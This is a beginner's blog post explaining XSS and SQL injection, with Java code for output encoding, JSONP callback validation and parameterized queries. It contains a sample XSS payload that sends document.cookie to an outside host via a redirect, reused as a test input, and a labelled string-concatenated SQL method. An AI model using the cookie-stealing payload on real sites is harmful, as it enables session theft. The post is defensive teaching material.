My knowledge of web security is quite weak. This article collects what I have learned about XSS cross-site attacks and SQL injection; I hope you will offer plenty of advice.
For preventing SQL injection I have only used simple string concatenation and parameterized queries, so I can hardly claim much experience. To avoid making a big mistake out of a half-understanding later on, I have drawn on the experience of many predecessors and put together this small summary. Everyone is welcome to criticize.
1. Cross-site scripting attacks (XSS)
The principle of cross-site scripting attacks
XSS is also called CSS (cross site script); it is an attack against websites. A malicious attacker inserts malicious script code into a Web page, the program does not filter the user input, and when another user browses that page the script embedded in it is executed, achieving the attacker's special purpose.
The dangers of cross-site scripting attacks include stealing cookies, planting worms, phishing, and so on.
Cross-site scripting attacks are classified as stored XSS, reflected XSS and DOM-based XSS.
XSS vulnerabilities are among the most common vulnerabilities in Web applications. If your site has no fixed method for preventing XSS, then it has an XSS vulnerability. What makes XSS vulnerabilities serious is that their threat is often hard to see, while a virus (worm) that exploits them takes full advantage of them.
XSS workflow
1) A malicious user enters some text in a common input area (for example a suggestion form or a message board form). The text will be seen by other users, but it is not only the text they appear to have entered: it also includes scripts that can be executed on the client. For example: http://xxx.xxx.com.cn/intf/_photos.jsp?callback=<script>window.location.href="http://www.baidu.com?a="+escape(document.cookie)</script>. If the parameter <script>xxx</script> is not escaped, the script is embedded in the page.
2) The form is submitted maliciously.
3) Other users view the page that includes the malicious script, and it executes, obtaining sensitive information such as the user's cookie.
In the following case (screenshots in the original post), the request is redirected to Baidu, and the value of the cookie appears in the query string of the resulting URL.
For a more detailed explanation of the XSS principle, see the article by the expert "small tank" in the blog park: XSS for web security testing.
So how do we defend against XSS?
One approach is to filter the required parameters before a form is submitted or a URL parameter is passed on; see the following XSS filtering tool class:
```java
import java.net.URLEncoder;

/**
 * Tool class for filtering illegal characters.
 */
public class EncodeFilter {

    // Filter most HTML special characters by replacing them with entities
    public static String encode(String input) {
        if (input == null) {
            return input;
        }
        StringBuilder sb = new StringBuilder(input.length());
        for (int i = 0, c = input.length(); i < c; i++) {
            char ch = input.charAt(i);
            switch (ch) {
                case '&':
                    sb.append("&amp;");
                    break;
                case '<':
                    sb.append("&lt;");
                    break;
                case '>':
                    sb.append("&gt;");
                    break;
                case '"':
                    sb.append("&quot;");
                    break;
                case '\'':
                    sb.append("&#x27;");
                    break;
                case '/':
                    sb.append("&#x2F;");
                    break;
                default:
                    sb.append(ch);
            }
        }
        return sb.toString();
    }

    // JavaScript-side filter: hex-escape everything that is not alphanumeric
    public static String encodeForJs(String input) {
        if (input == null) {
            return input;
        }
        StringBuilder sb = new StringBuilder(input.length());
        for (int i = 0, c = input.length(); i < c; i++) {
            char ch = input.charAt(i);
            // Do not encode alphanumeric characters and ',' '.' '_'
            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z'
                    || ch >= '0' && ch <= '9' || ch == ',' || ch == '.' || ch == '_') {
                sb.append(ch);
            } else {
                String temp = Integer.toHexString(ch);
                if (ch < 256) {
                    // Characters below 256 are encoded as \xHH
                    sb.append('\\').append('x');
                    if (temp.length() == 1) {
                        sb.append('0');
                    }
                    sb.append(temp.toLowerCase());
                } else {
                    // Otherwise encode as \uHHHH
                    sb.append('\\').append('u');
                    for (int j = 0, d = 4 - temp.length(); j < d; j++) {
                        sb.append('0');
                    }
                    sb.append(temp.toUpperCase());
                }
            }
        }
        return sb.toString();
    }

    /**
     * CSS illegal character filtering
     * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters
     */
    public static String encodeForCss(String input) {
        if (input == null) {
            return input;
        }
        StringBuilder sb = new StringBuilder(input.length());
        for (int i = 0, c = input.length(); i < c; i++) {
            char ch = input.charAt(i);
            // Alphanumeric characters pass through unchanged
            if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z'
                    || ch >= '0' && ch <= '9') {
                sb.append(ch);
            } else {
                // Emit the hex escape and end it with whitespace to terminate it
                sb.append('\\').append(Integer.toHexString(ch)).append(' ');
            }
        }
        return sb.toString();
    }

    /**
     * URL parameter encoding
     * http://en.wikipedia.org/wiki/Percent-encoding
     */
    public static String encodeURIComponent(String input) {
        return encodeURIComponent(input, "utf-8");
    }

    public static String encodeURIComponent(String input, String encoding) {
        if (input == null) {
            return input;
        }
        String result;
        try {
            result = URLEncoder.encode(input, encoding);
        } catch (Exception e) {
            result = "";
        }
        return result;
    }

    // Accept only http://, https:// and ftp:// URLs that contain no quote characters
    public static boolean isValidUrl(String input) {
        if (input == null || input.length() < 8) {
            return false;
        }
        char ch0 = input.charAt(0);
        if (ch0 == 'h') {
            if (input.charAt(1) == 't' && input.charAt(2) == 't' && input.charAt(3) == 'p') {
                char ch4 = input.charAt(4);
                if (ch4 == ':') {
                    if (input.charAt(5) == '/' && input.charAt(6) == '/') {
                        return isValidUrlChar(input, 7);
                    } else {
                        return false;
                    }
                } else if (ch4 == 's') {
                    if (input.charAt(5) == ':' && input.charAt(6) == '/' && input.charAt(7) == '/') {
                        return isValidUrlChar(input, 8);
                    } else {
                        return false;
                    }
                } else {
                    return false;
                }
            } else {
                return false;
            }
        } else if (ch0 == 'f') {
            if (input.charAt(1) == 't' && input.charAt(2) == 'p' && input.charAt(3) == ':'
                    && input.charAt(4) == '/' && input.charAt(5) == '/') {
                return isValidUrlChar(input, 6);
            } else {
                return false;
            }
        }
        return false;
    }

    // Reject the URL if any character from 'start' onwards is a quote
    static boolean isValidUrlChar(String url, int start) {
        for (int i = start, c = url.length(); i < c; i++) {
            char ch = url.charAt(i);
            if (ch == '"' || ch == '\'') {
                return false;
            }
        }
        return true;
    }
}
```
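The example URL in the workflow above puts the payload into a JSONP callback parameter, where the value is emitted inside a JavaScript response rather than HTML, so HTML entity encoding on its own does not neutralise it. The following is an added example, not code from the original post: a guard that validates the callback name against a strict allowlist instead of trying to "clean" it (the class and method names are hypothetical, the payload string is the one shown above).

```java
import java.util.regex.Pattern;

// Added example (not from the original post): defend the callback parameter of a
// JSONP endpoint such as /intf/_photos.jsp?callback=... by allowlisting the name.
public class JsonpCallbackGuard {

    // A JavaScript identifier path such as "cb", "jQuery17_handlePhotos" or "app.onPhotos".
    private static final Pattern SAFE_CALLBACK =
            Pattern.compile("^[A-Za-z_$][A-Za-z0-9_$]*(\\.[A-Za-z_$][A-Za-z0-9_$]*)*$");

    private static final int MAX_CALLBACK_LENGTH = 64;

    // True only for callback names that cannot break out of the JavaScript context:
    // no '<', '"', '(', ';' or whitespace can survive the pattern.
    public static boolean isSafeCallback(String callback) {
        return callback != null
                && callback.length() <= MAX_CALLBACK_LENGTH
                && SAFE_CALLBACK.matcher(callback).matches();
    }

    // Builds the response body; jsonPayload is assumed to be already-serialised JSON.
    // Rejecting an invalid name is preferred over rewriting it, so behaviour stays predictable.
    public static String buildJsonpResponse(String callback, String jsonPayload) {
        if (!isSafeCallback(callback)) {
            throw new IllegalArgumentException("invalid callback name");
        }
        // The leading comment is a common hardening so the body never starts with
        // caller-chosen bytes; a real servlet would also set
        // Content-Type: application/javascript and X-Content-Type-Options: nosniff.
        return "/**/" + callback + "(" + jsonPayload + ");";
    }

    public static void main(String[] args) {
        // Constructed inputs: the payload from the workflow above and a normal callback name.
        String attacker = "<script>window.location.href=\"http://www.baidu.com?a=\"+escape(document.cookie)</script>";
        String normal = "jQuery17_handlePhotos";
        System.out.println("payload accepted: " + isSafeCallback(attacker));
        System.out.println("normal accepted:  " + isSafeCallback(normal));
        System.out.println(buildJsonpResponse(normal, "{\"photos\":[]}"));
    }
}
```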
There are many bug reports about XSS errors, for example http://www.wooyun.org/bugs/wooyun-2010-016779
2. SQL injection vulnerability
The principle of SQL injection attacks:
User input parameters are spliced together into SQL query statements, which allows the user to control the SQL that is executed. For more information on SQL injection, please refer to: SQL Injection Defense Introduction
Defense methods
- Using precompiled statements
- Binding variables
- Using secure stored procedures
- Checking data types
- Using security functions
Recommended method: do not use stitched (concatenated) SQL; use placeholders, for example with JdbcTemplate.
Here is a workaround: replace the places where SQL is spliced together with the following helper class.
```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class SqlBuilder {
    protected StringBuilder sqlBuf = new StringBuilder();
    // Positional values, one per '?' placeholder
    protected List<Object> values = new ArrayList<Object>();
    // Named parameters, one per ':name' placeholder
    protected Map<String, Object> paramMap = new HashMap<String, Object>();

    public SqlBuilder appendSql(String sql) {
        sqlBuf.append(sql);
        return this;
    }

    public SqlBuilder appendValue(Object value) {
        sqlBuf.append('?');
        values.add(value);
        return this;
    }

    // Appends "(?,?,...,?)" and records the values in order
    public SqlBuilder appendValues(Object[] values) {
        sqlBuf.append('(');
        for (int i = 0, c = values.length; i < c; ++i) {
            sqlBuf.append('?').append(',');
            this.values.add(values[i]);
        }
        int last = sqlBuf.length() - 1;
        if (last > 0 && sqlBuf.charAt(last) == ',') {
            sqlBuf.setCharAt(last, ')');
        } else {
            sqlBuf.append(')');
        }
        return this;
    }

    public SqlBuilder appendEqParam(String param, Object value) {
        sqlBuf.append(param).append(" = :").append(param);
        paramMap.put(param, value);
        return this;
    }

    public SqlBuilder appendLtParam(String param, Object value) {
        sqlBuf.append(param).append(" < :").append(param);
        paramMap.put(param, value);
        return this;
    }

    public SqlBuilder appendGtParam(String param, Object value) {
        sqlBuf.append(param).append(" > :").append(param);
        paramMap.put(param, value);
        return this;
    }

    // Appends "param in (:param0,:param1,...)" with one named parameter per value
    public SqlBuilder appendInParam(String param, Object... values) {
        if (values == null) {
            return this;
        }
        sqlBuf.append(param).append(" in (");
        int len = values.length;
        for (int i = 0; i < len; i++) {
            if (i != 0) {
                sqlBuf.append(",");
            }
            sqlBuf.append(":").append(param).append(i);
            paramMap.put(param + i, values[i]);
        }
        sqlBuf.append(")");
        return this;
    }

    // The wildcard wrapping is part of the bound value, not of the SQL text
    public SqlBuilder appendLikeParam(String param, Object value) {
        sqlBuf.append(param).append(" like :").append(param);
        paramMap.put(param, "%" + value + "%");
        return this;
    }

    public String getSql() {
        return sqlBuf.toString();
    }

    public Object[] getValues() {
        return values.toArray();
    }

    public Map<String, Object> getParamMap() {
        return paramMap;
    }
}
```
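To make the contrast concrete, here is an added example (not code from the original post) showing the stitched query the post warns against next to the placeholder form that the SqlBuilder output is meant to feed into plain JDBC. It assumes a java.sql.Connection supplied by the caller and a hypothetical table users(id, name); the class and method names are likewise hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

// Added example (not from the original post). Assumes a JDBC Connection from the
// caller and a hypothetical table users(id, name).
public class UserLookup {
    // VULNERABLE: the value is spliced into the statement text, so an input such as
    // x' OR '1'='1 changes the query's structure instead of being compared as data.
    public static String buildUnsafeSql(String name) {
        return "SELECT id FROM users WHERE name = '" + name + "'";
    }

    // SAFE: the statement text is fixed; the driver ships the value separately, so it
    // is never parsed as SQL. This is the shape SqlBuilder.appendValue produces.
    public static List<Long> findIdsByName(Connection conn, String name) throws SQLException {
        try (PreparedStatement ps = conn.prepareStatement("SELECT id FROM users WHERE name = ?")) {
            ps.setString(1, name);
            return readIds(ps);
        }
    }

    // Binding stops injection but not LIKE wildcards: SqlBuilder.appendLikeParam wraps
    // the value in %...%, so a user-typed '%' or '_' still widens the match. Escape them
    // with a declared escape character ('!' here, which is portable across databases).
    public static String escapeLikeWildcards(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }

    public static List<Long> findIdsByNameContaining(Connection conn, String fragment) throws SQLException {
        try (PreparedStatement ps = conn.prepareStatement("SELECT id FROM users WHERE name LIKE ? ESCAPE '!'")) {
            ps.setString(1, "%" + escapeLikeWildcards(fragment) + "%");
            return readIds(ps);
        }
    }

    private static List<Long> readIds(PreparedStatement ps) throws SQLException {
        List<Long> ids = new ArrayList<Long>();
        try (ResultSet rs = ps.executeQuery()) {
            while (rs.next()) {
                ids.add(rs.getLong("id"));
            }
        }
        return ids;
    }
}
```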
The two vulnerabilities above are often encountered in web development. Others include denial-of-service vulnerabilities, cross-site request forgery (CSRF), open redirect vulnerabilities and so on; I will learn about them slowly!!!
Web security: XSS Vulnerability and SQL Injection Vulnerability Introduction and solutions